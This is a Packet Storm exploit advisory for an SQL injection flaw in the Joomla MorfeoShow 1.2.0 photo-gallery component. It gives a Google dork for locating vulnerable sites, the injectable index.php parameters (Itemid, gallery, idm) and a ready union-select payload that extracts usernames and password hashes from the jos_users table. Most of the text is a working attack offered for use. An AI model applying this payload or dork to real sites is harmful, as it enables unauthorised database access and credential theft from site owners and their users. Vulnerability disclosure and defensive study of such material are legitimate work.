Joomla MorfeoShow 1.2.0 SQL Injection

2019-01-31T00:00:00
ID PACKETSTORM:151432
Type packetstorm
Reporter KingSkrupellos
Modified 2019-01-31T00:00:00

Description

                                        
                                            `####################################################################  
  
# Exploit Title : Joomla MorfeoShow Components 1.2.0 SQL Injection  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 31/01/2019  
# Vendor Homepage : joomla4ever.org  
# Software Download Link : joomla4ever.org/archive/ext/com_morfeoshow.zip  
# Software Information Link : joomla4ever.org/extensions/ext-morfeoshow  
# Software Version : 1.2.0  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/index.php?option=com_morfeoshow''  
# Vulnerability Type : CWE-89 [ Improper Neutralization of   
Special Elements used in an SQL Command ('SQL Injection') ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
MorfeoShow - Photo Gallery for Joomla 1.5 + plugin to insert photos in the site's content!  
  
####################################################################  
  
# Impact :  
***********  
  
* An attacker might be able inject and/or alter existing   
  
SQL statements which would influence the database exchange.  
  
* SQL injection vulnerability in the Joomla MorfeoShow Components 1.2.0 because,  
  
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  
  
* On the other hand, this component MorfeoShow for Joomla! allows   
  
remote attackers to execute arbitrary SQL commands   
  
via the " Itemid=, gallery=, idm= "   
  
with different parameters action to index.php.  
  
* Exploiting this issue could allow an attacker to compromise the application, read,  
  
access or modify data, or exploit latent vulnerabilities in the underlying database.   
  
If the webserver is misconfigured, read & write access to the filesystem may be possible.  
  
####################################################################  
  
# SQL Injection Exploit :  
**********************  
  
/index.php?option=com_morfeoshow&Itemid=[SQL Injection]  
  
/index.php?option=com_morfeoshow&task=view&gallery=[SQL Injection]  
  
/index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[SQL Injection]  
  
/index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[ID-NUMBER]&Itemid=[ID-NUMBER]&idm=[SQL Injection]  
  
# SQL Injection Exploit Payload :  
*****************************  
  
+and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`